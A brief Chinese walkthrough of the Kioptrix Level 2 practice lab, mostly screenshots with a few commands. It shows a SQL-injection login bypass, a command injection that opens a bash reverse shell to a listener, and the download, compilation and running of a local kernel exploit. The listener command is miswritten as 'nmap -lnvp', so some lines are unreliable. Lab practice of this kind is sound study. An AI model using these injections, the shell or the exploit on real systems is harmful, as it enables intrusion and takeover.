Vulnhub靶机 Kioptrix: Level 2

Vulnhub靶机 Kioptrix: Level 2_第1张图片
找靶机,扫端口

Vulnhub靶机 Kioptrix: Level 2_第2张图片

没有验证机制
看的我都想暴力破解了
万能密码试一下
可以绕过

Vulnhub靶机 Kioptrix: Level 2_第3张图片

admin‘ or ’1‘=’1

Vulnhub靶机 Kioptrix: Level 2_第4张图片
Vulnhub靶机 Kioptrix: Level 2_第5张图片
抓包,这个样子
命令执行

Vulnhub靶机 Kioptrix: Level 2_第6张图片

192.168.0.128;bash -i >& /dev/tcp/192.168.0.128/4444 0>&1&
nmap -lnvp 4444

在这里插入图片描述

在这里插入图片描述

linux内核2.6.9在这里插入图片描述
在这里插入图片描述

Vulnhub靶机 Kioptrix: Level 2_第7张图片

在这里插入图片描述

python -m SimpleHTTPServer 8080
cd /tmp
wget http://192.168.0.128/1.c
gcc -o 9545 1.c
./9545
whoami

完成

你可能感兴趣的:(vulnhub)